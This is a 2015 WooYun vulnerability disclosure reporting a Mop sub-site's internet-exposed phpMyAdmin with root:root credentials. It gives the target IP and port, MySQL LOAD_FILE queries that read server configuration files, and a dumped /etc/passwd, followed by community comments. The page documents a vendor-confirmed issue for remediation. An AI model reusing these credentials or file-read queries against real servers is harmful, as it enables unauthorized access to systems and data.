当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-089859

漏洞标题:猫扑某分站phpmyadmin对外(root弱口令)

相关厂商:猫扑

漏洞作者: 猪猪侠

提交时间:2015-01-03 23:49

修复时间:2015-02-17 23:50

公开时间:2015-02-17 23:50

漏洞类型:后台弱口令

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-01-03: 细节已通知厂商并且等待厂商处理中
2015-01-04: 厂商已经确认,细节仅向厂商公开
2015-01-14: 细节向核心白帽子及相关领域专家公开
2015-01-24: 细节向普通白帽子公开
2015-02-03: 细节向实习白帽子公开
2015-02-17: 细节向公众公开

简要描述:

猫扑某分站phpmyadmin对外,root弱口令,有数据库,可readfile,outfile,有点累就不深入了

详细说明:

最近有点累就不深入了

mopgame_index.png


http://171.111.157.200:81/phpmyadmin/
root:root


mopgame.png

漏洞证明:

SELECT LOAD_FILE( '/etc/httpd/conf/httpd.conf' )
SELECT LOAD_FILE( '/var/www/html/phpmyadmin/index.php' )
readfile:/etc/passwd

root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
games:x:12:100:games:/usr/games:/sbin/nologin
gopher:x:13:30:gopher:/var/gopher:/sbin/nologin
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
nobody:x:99:99:Nobody:/:/sbin/nologin
dbus:x:81:81:System message bus:/:/sbin/nologin
rpc:x:32:32:Rpcbind Daemon:/var/cache/rpcbind:/sbin/nologin
vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin
abrt:x:173:173::/etc/abrt:/sbin/nologin
haldaemon:x:68:68:HAL daemon:/:/sbin/nologin
ntp:x:38:38::/etc/ntp:/sbin/nologin
saslauth:x:499:76:"Saslauthd user":/var/empty/saslauth:/sbin/nologin
postfix:x:89:89::/var/spool/postfix:/sbin/nologin
rpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologin
nfsnobody:x:65534:65534:Anonymous NFS User:/var/lib/nfs:/sbin/nologin
arpwatch:x:77:77::/var/lib/arpwatch:/sbin/nologin
sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
uuidd:x:498:499:UUID generator helper daemon:/var/lib/libuuid:/sbin/nologin
tcpdump:x:72:72::/:/sbin/nologin
nscd:x:28:28:NSCD Daemon:/:/sbin/nologin
oprofile:x:16:16:Special user account to be used by OProfile:/home/oprofile:/sbin/nologin
apache:x:48:48:Apache:/var/www:/sbin/nologin
mysql:x:27:27:MySQL Server:/var/lib/mysql:/bin/bash

修复方案:

删除弱口令

版权声明:转载请注明来源 猪猪侠@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:12

确认时间:2015-01-04 11:17

厂商回复:

感谢一哥,注意休息

最新状态:

暂无


漏洞评价:

评论

  1. 2015-01-03 23:50 | 猪猪侠 认证白帽子 ( 核心白帽子 | Rank:3224 漏洞数:254 | 你都有那么多超级棒棒糖了,还要自由干吗?)

    诶,忘记点上匿名了,看来我真的是累了

  2. 2015-01-03 23:54 | 子非海绵宝宝 认证白帽子 ( 核心白帽子 | Rank:1044 漏洞数:106 | 发扬海绵宝宝的精神!你不是海绵宝宝,你怎...)

    @猪猪侠 ....是累了 不然shell+内网漫游了

  3. 2015-01-03 23:55 | _Thorns ( 普通白帽子 | Rank:882 漏洞数:157 | 收wb 1:5 无限量收 [平台担保]))

    哈哈哈

  4. 2015-01-04 00:04 | winalva ( 路人 | Rank:9 漏洞数:3 | rank是什么?)

    ccav看这里

  5. 2015-01-04 00:14 | cinba ( 路人 | Rank:21 漏洞数:12 | @horizon sec RDFZ)

    前排

  6. 2015-01-04 07:36 | ’‘Nome ( 实习白帽子 | Rank:55 漏洞数:19 | 在此感谢 @M4sk @mango @裤裆 @泳少 @5up3r...)

    找审核,改吧,就算你怎么改我还是爱你的@猪猪侠

  7. 2015-01-04 08:32 | 泳少 ( 普通白帽子 | Rank:231 漏洞数:79 | ★ 梦想这条路踏上了,跪着也要...)

    让你陪我搞翻译你不搞。好了吧?匿名忘记了。:)

  8. 2015-01-04 09:23 | lijiejie 认证白帽子 ( 核心白帽子 | Rank:2210 漏洞数:294 | Just for fun.)

    假期还这么累,在作甚呐?

  9. 2015-01-04 10:00 | 杀器王子 认证白帽子 ( 普通白帽子 | Rank:1532 漏洞数:121 | 磨刀霍霍向猪羊)

    你你你你你

  10. 2015-01-04 11:24 | 小玉 ( 路人 | Rank:4 漏洞数:1 )

    Miss猫满脸幽怨地娇嗔道:“有点累了?不深入了?自己爽了就不顾及人家的感受啦?男人真不是个东西!”

  11. 2015-01-04 12:02 | Mr .LZH ( 普通白帽子 | Rank:583 漏洞数:75 | 非妹子勿扰···)

    @猫扑 你脑门被夹了,不知道一哥是谁?

  12. 2015-01-04 13:17 | gainover 认证白帽子 ( 核心白帽子 | Rank:1710 漏洞数:93 | PKAV技术宅社区! -- gainover| 工具猫网络-...)

    @猪猪侠 拯救世界也要注意休息。

  13. 2015-01-04 16:18 | sky ( 实习白帽子 | Rank:94 漏洞数:33 | 有一天,我带着儿子@jeary 去@园长 的园长...)

    又是神器的杰作

  14. 2015-01-21 16:36 | wefgod ( 普通白帽子 | Rank:1807 漏洞数:179 | 力不从心)

    @猪猪侠 多休息,少lu。大牛为何要匿名啊

  15. 2015-02-18 01:02 | 路飞 ( 普通白帽子 | Rank:112 漏洞数:21 | 上帝恩赐,命运天定。希望之光,普照我身。...)

    @wefgod 猪怕出名,人怕壮

  16. 2015-02-18 09:27 | BMa ( 普通白帽子 | Rank:1776 漏洞数:200 )

    @路飞 .....